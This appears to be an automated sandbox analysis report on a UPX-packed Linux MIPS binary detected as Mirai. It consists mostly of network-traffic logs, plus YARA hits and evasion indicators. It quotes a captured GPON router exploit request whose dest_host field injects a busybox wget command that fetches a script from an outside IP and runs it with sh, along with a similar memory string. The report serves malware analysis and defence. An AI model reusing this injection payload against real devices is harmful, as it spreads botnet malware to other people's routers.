Source: unknown Network traffic detected: HTTP traffic on port 51578 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42434
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45940
Source: unknown Network traffic detected: HTTP traffic on port 52858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41184
Source: unknown Network traffic detected: HTTP traffic on port 51522 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55564 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34642
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33320
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55110
Source: unknown Network traffic detected: HTTP traffic on port 56110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47714
Source: unknown Network traffic detected: HTTP traffic on port 42742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46622
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44682
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44684
Source: unknown Network traffic detected: HTTP traffic on port 34262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33548
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56444
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56202
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35970
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54274
Source: unknown Network traffic detected: HTTP traffic on port 54100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47944
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47700
Source: unknown Network traffic detected: HTTP traffic on port 60470 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37298 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44624 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33538
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57552
Source: unknown Network traffic detected: HTTP traffic on port 53984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54044
Source: unknown Network traffic detected: HTTP traffic on port 55844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42482
Source: unknown Network traffic detected: HTTP traffic on port 32790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35940
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45508
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44658
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44492
Source: unknown Network traffic detected: HTTP traffic on port 34148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52276
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58810
Source: unknown Network traffic detected: HTTP traffic on port 44074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44658 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33360
Source: unknown Network traffic detected: HTTP traffic on port 54122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43394
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45572
Source: unknown Network traffic detected: HTTP traffic on port 44508 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53458 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58468 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36620
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34676
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33352
Source: unknown Network traffic detected: HTTP traffic on port 51530 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45566
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43388
Source: unknown Network traffic detected: HTTP traffic on port 35940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51146 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43218 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45508 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43386
Source: unknown Network traffic detected: HTTP traffic on port 37554 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35566 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44460 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55564
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57742
Source: unknown Network traffic detected: HTTP traffic on port 55260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38576 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34674
Source: unknown Network traffic detected: HTTP traffic on port 43064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37934
Source: unknown Network traffic detected: HTTP traffic on port 60050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45318
Source: unknown Network traffic detected: HTTP traffic on port 40066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43130
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44460
Source: unknown Network traffic detected: HTTP traffic on port 34126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58846
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35984
Source: unknown Network traffic detected: HTTP traffic on port 36708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34660
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48818
Source: unknown Network traffic detected: HTTP traffic on port 60342 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 36280 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57254
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57494
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58580
Source: unknown Network traffic detected: HTTP traffic on port 38506 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56160
Source: unknown Network traffic detected: HTTP traffic on port 51674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60664
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38712
Source: unknown Network traffic detected: HTTP traffic on port 34660 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36486 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 34364
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59200
Source: unknown Network traffic detected: HTTP traffic on port 55086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43064
Source: unknown Network traffic detected: HTTP traffic on port 54884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47086 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45002
Source: unknown Network traffic detected: HTTP traffic on port 48652 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45240
Source: unknown Network traffic detected: HTTP traffic on port 38448 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36772
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: unknown TCP traffic detected without corresponding DNS query:
Source: HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmp String found in binary or memory:;sh%20/tmp/jno%27/&sessionKey=10392301
Source: HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmp String found in binary or memory:
Source: HCyigyiCAH String found in binary or memory:
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 34 2e 32 34 34 2e 37 32 2e 31 38 35 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+;sh+/tmp/gaf`&ipv=0

System Summary:

Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappings Program segment: 0x100000
Yara signature match
Source: HCyigyiCAH, type: SAMPLE Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: classification engine Classification label: mal72.troj.evad.lin@0/0@0/0
Source: HCyigyiCAH Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link

Data Obfuscation:

Sample is packed with UPX
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer $
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer $
Source: initial sample String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48002
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48030
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48034
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 47980
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48066
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48068
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48070
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48046
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48074
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48078
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48082
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48080
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48090
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48092
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48098
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48100
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48088
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48120
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 48152
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45110
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45112
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45132
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45132
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45140
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45160
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45168
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45170
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45174
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45194
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 45210

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/HCyigyiCAH (PID: 5287) Queries kernel information via 'uname': Jump to behavior
Source: HCyigyiCAH, Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/HCyigyiCAHSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/HCyigyiCAH
Source: HCyigyiCAH, Binary or memory string: /etc/qemu-binfmt/mips
Source: HCyigyiCAH, Binary or memory string: /usr/bin/qemu-mips
Source: HCyigyiCAH, Binary or memory string: V!/etc/qemu-binfmt/mips

Stealing of Sensitive Information:

Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs